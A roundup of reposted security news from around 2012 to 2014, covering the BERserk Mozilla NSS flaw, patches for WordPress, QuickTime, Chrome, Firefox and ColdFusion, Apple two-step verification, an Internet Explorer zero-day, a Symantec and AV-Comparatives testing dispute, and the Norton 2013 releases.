What you need to know about BERserk and Mozilla

The Intel Security Advanced Threat Research Team has discovered a critical signature forgery vulnerability in the Mozilla Network Security Services (NSS) crypto library that could allow malicious parties to set up fraudulent sites masquerading as legitimate businesses and other organizations.

The Mozilla NSS library, commonly utilized in the Firefox web browser, can also be found in Thunderbird, Seamonkey, and other Mozilla products.  Dubbed “BERserk”, this vulnerability allows for attackers to forge RSA signatures, thereby allowing for the bypass of authentication to websites utilizing SSL/TLS.  Given that certificates can be forged for any domain, this issue raises serious concerns around integrity and confidentiality as we traverse what we perceive to be secure websites.


What users can do immediately

Individual Firefox browser users can take immediate action by updating their browsers with the latest patches from Mozilla.

Google has also released updates for Google Chrome and ChromeOS, as these products also utilize the vulnerable library.

Ensuring that privacy and integrity be maintained is core to what we do at Intel Security.  As this issue unfolds we will continue to provide updates on effective countermeasures and proper mitigation strategies.

Read the whole story at McAfee Blog

WordPress hardened with XSS, DoS and SSRF fixes

WordPressWith the second security and maintenance release of WordPress 3.5, the developers of the popular open source blogging software have closed 12 bugs, seven of them security issues. In their announcement, the developers “strongly encourage” all users to update all their installations of the software to version 3.5.2 immediately. In addition to the fixed vulnerabilities, the new release also includes some proactive changes intended to harden the platform against attacks.

Security fixes in this release include measures to prevent server-side request forgery (SSRF) attacks. The TinyMCE editor, the external SWFUpload library and other components have been updated to fix cross-site scripting (XSS) holes; WordPress’s own SWFUpload fork is used by the blogging platform to transfer files to the server, while TinyMCE is used as the software’s content editor. A problem that could be exploited by attackers to perform denial-of-service (DoS) attacks on sites that use WordPress’s password protection for posts has also been fixed.

WordPress 3.5.2 is available for download from the project’s web site. Alternatively, existing users can update automatically via DashboardUpdates in the WordPress admin interface. The source code for WordPress is licensed under the GPLv2 or later.

Cross-posted from Heise-Security.

Apple closes QuickTime vulnerabilities on Windows

appleApple has released a security update for its QuickTime media framework for Windows. Version 7.7.4 of the software closes 12 critical security holes causing memory corruption and buffer overflows when processing a number of media formats. The vulnerabilities affect Windows 7, Vista and XP SP2 or later and could be exploited to cause arbitrary code execution and application crashes.

The vulnerabilities affected the playback of MP3, H.263, H.264, TeXML, JPEG, QTIF, Sorenson Video and FPX files as well as the handling of dref, enof and mvhd atoms within the program. All of the problems were reported by researchers working with HP’s Zero Day Initiative, five of them by Tom Gallagher and Paul Bates from Microsoft.

At the time of writing, Apple is not yet listing details about the fixed bugs on its security web site, but has announced that it will do so soon. The 40MB update for the free product can be downloaded from Apple’s Support Downloads web site.

via h-online

Symantec vs AV-Comparatives, Which one do you trust?

Cross-posted from PCMag SecurityWatch:

symantec-calls-test-misleadingLast week independent antivirus lab AV-Comparatives released the results of an on-demand antivirus detection test. The fact that Microsoft came in near the bottom wasn’t big news; the fact that Symantec scored even lower was surprising indeed. In a blog post released today, Symantec decried the entire practice of performing on-demand malware scanning tests, calling it “misleading.”

In the early years of antivirus testing, every test was an on-demand scanning test. Researchers would assemble a collection of known malware, run a full scan, and record the percentage of samples detected. Modern labs work hard to devise tests that more closely reflect a user’s real-world experience, taking into account the fact that the vast majority of infections enter the computer from the Internet. Symantec contends that only the real-world sort of test is valid; I don’t entirely agree.

Crippled Protection?
Alejandro Borgia, senior director of product management for Symantec Corporation, stated categorically in his blog post that “the cited detection rates are misleading and not representative of real-world product efficacy.” Borgia said, “These types of file scanning tests are run in artificial environments that cripple all modern protection features.”

It’s true that AV-Comparatives made sure the test systems had Internet access, thereby giving the Symantec installation access to the powerful cloud-based Norton Insight reputation system. When I asked my Symantec contacts about this, they explained that for full power Norton Insight relies on full information, “how the file was obtained, when it was obtained, or from where it was obtained (e.g. URL and IP address).” An on-demand file scanner test on files whose arrival Symantec’s antivirus did not observe is not the same as when the user actually downloads files. That’s true, but it is the same as when a user installs antivirus to clean up an existing malware problem.

The network intrusion prevention components also got no chance to help out, since the file samples were downloaded before installation of antivirus software. Once again, you’d be in a similar situation when installing antivirus for the first time on an infested system. And of course behavior-based detection never kicks in until a program actually begins to execute.

In response to a query about behavior-based protection taking action only after a malicious file is launched, my Symantec contacts pointed out that “behavior” includes more than actions taken by the program. “Our behavioral technology takes into account a program’s location, how it is registered on the system (e.g., what registry keys refer to it), and many other factors,” they explained. “In most cases, the program will be stopped prior to it causing any harm.”

Is It Misleading?
As to the claim that the test is misleading, AV-Comparatives doesn’t agree. The introduction to the report itself that “the file detection rate of a product is only one aspect,” and points to “other test reports which cover different aspects.”

“It is clearly stated, that only one feature of the product is tested,” said Peter Stelzhammer, co-founder of AV-Comparatives. “If Symantec is thinking the file detection feature is worthless, why is it still included in the product?” Stelzhammer pointed out that file detection is needed for initial cleanup, and that PCs don’t always have an Internet connection. Even so, “the test was run with full internet connection and Symantec cloud features have been granted access to their cloud.”

Borgia likens testing file detection alone to testing a car’s safety systems by first disabling everything but the lap belt, stating that such a test would be “entirely flawed.” And yet, a test like that might well identify problems with a weak lap belt, so “entirely flawed” seems an overstatement.

Real World Tests Only?
Borgia notes that Symantec strongly supports real-world tests, tests “that most closely represent the threat environment and utilize all of the proactive technologies provided with a product.” I can hardly disagree, but such tests require a huge amount of time and effort. The blog post holds up the testing performed by Dennis Labs as one shining example. Dennis Labs records the process of infection from real-world URLs and then uses a Web replay system to repeat the exact same process under each antivirus product’s protection. Admirable indeed, but it takes a lot of time and effort.

AV-Comparatives itself runs real-world tests every day, challenging a collection of antivirus products installed in identical test rigs to defend against malware from hundreds of very new real-world malicious URLs. Every month they summarize the data, and every quarter they release a full Real World Protection report. The process is labor-intensive enough that they rely on help from the University of Innsbruck and on partial funding by the Austrian government.

You’d expect Symantec to shine in this real-world test by AV-Comparatives. “Unfortunately,” noted Stelzhammer, “Symantec did not want to join our main test series.” Symantec chose not to participate, they said, because “AV-Comparatives does not offer vendors a subscription focused solely on real-world tests, while opting out of the file scan test.” However, this strategy seems to have backfired. Even though the company didn’t subscribe, AV-Comparatives put Symantec into the on-demand test “as the results have been highly demanded by our readers and the press.”

Multiple Tests Have Value
Symantec’s blog post concludes, “We look forward to the day when all published tests are real-world tests. In the meantime, readers need to beware of artificial tests that show misleading product comparisons.” I, too, would be thrilled to see more tests that match a user’s real-world experience, but I don’t think we can discard file-detection tests.

Consider this. If you purchase antivirus software for a system that never had protection, you’ll expect it to clean up any and all malware, without griping that it wasn’t given a chance to use its network intrusion prevention. In a case like that you’ll probably look for high scores in a test like the AV-Comparatives on-demand test, a test that fairly closely matches your situation.

For ongoing protection, yes, you’ll want a product that earns top scores in real world tests also. So choose a product that scores high in both areas, and in tests from multiple labs. That way you’ll get protection that can take care of any problems existing at installation and also fend off future malware attacks.

Apple adds two-step verification option for Apple IDs

A new security option gives Apple’s customers a way to secure their Apple ID password using their phone.

Apple 2step Verification

Cross-posted from Cnet:

Apple today added an extra layer of security to its Apple ID system that can harden the password people use to log in to various Apple services.

Users with an Apple ID can now sign up for two-step verification of their password, a system that sends a four-digit passcode by text message to a user’s phone, and must be used on top of a regular password. In practice, this could keep an account from being compromised by an attacker, unless that person had access to the mobile device too.

The move comes a little less than a year after Apple required users to set up security questions for their online accounts, a common security measure that was notably absent. Once two-step verification is enabled, there are no longer security questions to remember.

“Apple takes customer privacy very seriously, and two-step verification is an even more robust process to ensure our user’s data remains protected,” an Apple spokesperson told CNET. “We are now offering our users the choice to take advantage of this additional layer of security.”

Of note, the feature is currently available only in the U.S., U.K, Ireland, Australia and New Zealand.

Apple is the latest tech company to employ the security feature, which was discovered earlier by 9to5mac, as an option. Google, which has quite a few more online services than Apple, added it as an option in early 2011. Others, including Facebook, Yahoo, PayPal, and Dropbox already had the option.

The need for that extra layer of security was highlighted in the woes of journalist Mat Honan, who was targeted in a cascade of account hacking last year. That all kicked off with Honan’s iCloud account and eventually led to access of his personal e-mail and Twitter accounts. That ultimately led to Apple reviewing its security processes for resetting account passwords. Evernote also said it plans to add it later this year, following a cyberattack earlier this month.

More recently, Apple itself was the target of a coordinated attack that used a vulnerability in the Java plug-in to gain access to corporate systems as well as employee computers. In a statement last month, the company said there was no evidence any data was taken. Apple was just one of several companies involved in a series of attacks that also targeted Facebook, The New York Times, The Wall Street Journal, and The Washington Post.

Apple’s user base at its various stores and other online stores continues to grow. Its last official number, released in January, put it at “over 500 million active accounts.”

Google updates all Chrome editions

new-chrome-logoh-online: Google has updated the Stable, Beta and Developer Channels of the desktop version of its Chrome browser with a number of bug fixes and improvements. The Stable Channel update closes seven security vulnerabilities, three of them rated High, and includes bug fixes. New stable Chrome versions for iOS and Android have also been released and include minor improvements. The iOS version of the browser now supports Apple’s Passbook application.

The update to the Stable version of Chrome for Windows, Mac OS X, Linux and Chrome Frame (for running Chrome inside of Internet Explorer) brings it to version 23.0.1271.91. The update closes a security vulnerability in the Mac OS X version of the browser that is caused by a severe rendering bug with the operating system’s driver for Intel graphics cards. This problem was rated by Google as High priority, as was a buffer underflow problem in libxml and a use-after-free bug in the browser’s SVG filters, which have also been fixed.

The Beta Channel of Chrome for Windows, Mac OS X, Linux and Chrome Frame has been updated to version 24.0.1312.25, which includes a number of bug fixes for running applications within the browser, fixes stability issues, and solves two problems with the taskbar in Windows 8. The Beta version of Chrome for Chrome OS is now 23.0.1271.94; the update improves network stability and updates the included Pepper Flash plugin.

In the Developer Channel, Chrome for Windows, Mac OS X and Chrome Frame has been updated to version 25.0.1337.0 which includes a number of fixes and improvements, most noticeably improvements to the Live Tiles functionality for Windows 8 and bug fixes for Flash on Mac OS X. Chrome for the Chrome OS Developer Channel is now at version 25.0.1324.1, which includes a firmware update.

Chrome for iOS has been updated to version 23.0.1271.91 which has introduced the ability to open PDFs in other applications and enables users to save their airline boarding passes and tickets in Apple’s Passbook. The update also brings some security and stability improvements. Chrome for Android is now at version 18.0.1025469 on ARM and version 18.0.1026322 on x86 devices; both updates fix stability issues.

An overview over the different desktop Chrome release channels and platform is available from the Chromium Project, the open source upstream of Chrome. The listing includes download links for the different versions of the browser. All versions of Chrome should update themselves automatically; on some mobile platforms the user will be prompted to perform the update.


Firefox 16 re-released fixing multiple vulnerabilities

Mozilla_Firefox_cracked_bandaid_120The H-Online: The latest version of Firefox, version 16, has returned to Mozilla’s servers with the release of Firefox 16.0.1 after the discovery of vulnerabilities caused the organization to remove the just-released open source web browser from circulation. Mozilla’s security blog post described the problem as just that of a malicious web site being able to potentially determine the URLs and parameters used and suggested downgrading to Firefox 15.0.1, despite the numerous critical bugs fixed in Firefox 16.

But on Wednesday, Gareth Heyes, an independent security researcher, posted a proof of concept (PoC) which demonstrated that Firefox 16 was somewhat insecure with its Windows location variables, allowing an attacker to open a window pointing at some part of another site (in the PoC, twitter.com), wait for that site to redirect the window to a “logged in” page (a twitter.com profile page) and then retrieve the new location and any associated data (in the PoC, the user’s twitter handle). Accessing the location information should normally be prevented by the browser’s “Same Origin” policy.

According to Mozilla’s advisory though, a similar but separate critical flaw had been found in Firefox 16, Firefox ESR 10.0.8, SeaMonkey 2.13, Thunderbird 16 and Thunderbird ESR 10.0.8 and earlier, which not only disclosed the location object, but, in Firefox 15 and earlier, had the potential for arbitrary code execution. Firefox 16.0.1 closes both these holes. The presence of the flaw in Firefox 15 does, though, raise questions over the previous advice given by Mozilla to downgrade from 16 to 15.

But these were not the only holes fixed in 16.0.1; another security advisory says developers also identified two of the top crashing bugs in the browser engine and that these bugs showed signs of having corrupted memory. Mozilla concludes that it could be possible to exploit these holes to execute code. One of the bugs only affected FreeType on mobile devices and is therefore fixed in Firefox 16.0.1 for Android, while the other is a WebSockets bug in Firefox 16 only and is not present in Firefox ESR.

Firefox 16.0.1 is now being pushed out to the Firefox browser’s auto update system and is also available to download via auto-version-detected download or from the all systems and languages page. Firefox 16.0.1 for Android is available in the Google Play store. Thunderbird 16.0.1 is also available for download. Firefox ESR 10.0.9 and Thunderbird ESR 10.0.9 are currently being quality assured and are expected to be released soon. SeaMonkey 2.13.1 has yet to appear on the project’s releases page.


Internet Explorer security hole: Use other browser

TheTelegraph: Internet Explorer users might want to consider upgrading or switching to another browser after a massive security hole was discovered in Windows’ native web browser.

internetexplorer9logoAccording to security forum, Rapid7 , Internet Explorer 7, 8 and 9 operating on Windows XP, Vista and Seven contains what is known as a “zero day exploit” which allows attackers to gain access to your personal data while you browse.

The forum claimed the exploit would give cyber criminals “the same privileges as the current user”.

It claimed that 41 per cent of US and 32 per cent of global Internet Explorer users could be affected.

Microsoft confirmed that it was aware of the targeted attacks “potentially affecting some versions of Internet Explorer”.

Director of Microsoft Trustworthy Computer, Yunsun Wee, told Fairfax that Internet Explorer 10 is not affected by the issue.

“We recommend customers deploy Microsoft’s Enhanced Mitigation Experience Toolkit 3.0, which provides effective protections without affecting the web browsing experience,” he said. “We will continue to investigate this issue and take further actions as appropriate.”

Adobe fixes ColdFusion security vulnerability

adobe_logo200h-Online: On the same day as Microsoft’s September Patch Tuesday, Adobe released an update for ColdFusion to close a security hole in its rapid web application development software. The hotfix for ColdFusion addresses a vulnerability (CVE-2012-2048), which the company rates as important, that could be exploited by a remote attacker to cause a denial-of-service (DoS) condition.

According to Adobe, the unspecified error affects versions 8.0, 8.0.1, 9.0 to 9.0.2, and 10 of ColdFusion for Windows, Mac OS X and UNIX. Installing the provided hotfix corrects the problem; download links and installation instructions for each affected version are provided on the APSB12-21 technote page. All users are advised to download and apply the hotfix. Adobe credits UK developer David Boyer for finding and reporting the problem.


Symantec releases Norton 2013 security suites


BetaNews: Symantec has released brand new versions of its Norton security packages for Windows, Norton Anti-Virus 2013, Norton Internet Security 2013 and Norton 360 2013. It’s the first time all three packages have been updated simultaneously, while the branding has also been amended to remove all references to a date, simply naming each Norton Anti-Virus, Norton Internet Security and Norton 360, respectively.

The 2013 versions come with what Symantec describes as “five layers of patented protection”, which include stronger social networking and anti-scam protection. There’s also full, certified support for Windows 8 and the promise of better performance on multi-core CPUs.

Symantec has focused its efforts on two related areas of protection for the 2013 releases, providing stronger protection for those using social networking sites. One in ten social network users has, according to the current annual Norton CyberCrime Report, fallen prey to fake links or scams, and so a new Scam Insight tool provides warnings against potentially risky websites along with an improved Norton Safe Web for Facebook app, providing users with the ability to quickly scan their timeline for potential scams and fake links.

Other improvements to existing protection include more rapid updates for the Insight file reputation database, which now also tracks IP addresses to help determine where threats are originating from.

Norton’s 2013 product are also fully certified with Windows 8. This includes integration with Windows 8’s Early Launch of Anti-Malware (ELAM) technology that permits security software to be up and running much earlier in the boot process than was the case with Windows 7, and which helps nullify certain rootkits. Also implemented is a new memory heap manager for helping to block and minimize the dangers from memory exploits.

The user interface has also been tweaked to be more Windows 8-friendly, with touch support and tile-based buttons. Staying up to date has been made simpler too, with all product updates now delivered automatically, and reboots eliminated from the install and update process.

The 2013 product line comes with a Network Cost Awareness feature – choose Settings > Network Security Settings > Network Cost Awareness  and click Configure – that allows specific network connections to be set to Economy, to prevent unnecessary updates from being downloaded on bandwidth-limited connections such as 3G.

Finally, all three Norton 2013 products are engineered to take advantage of newer multi-core processors and inbuilt technologies in Windows 8 to deliver faster startup and shutdown times over its immediate predecessor. Sadly, boot times remain a little long in Windows 7, although the apps overall effect on system performance is light. Other performance tweaks include better support for digital media, plus reduced power consumption to help extend battery life.

Norton AntiVirus 2013 FINAL, Norton Internet Security 2013 FINAL and Norton 360 2013 are all available now as a free 30-day trial downloads for PCs running Windows XP SP2 or later. Prices start from $49.99 for a single-user, 12-month license of Norton AntiVirus 2013 FINAL, with three-user licenses for Norton Internet Security 2013 and Norton 360 2013 costing $79.99 and $89.99 respectively.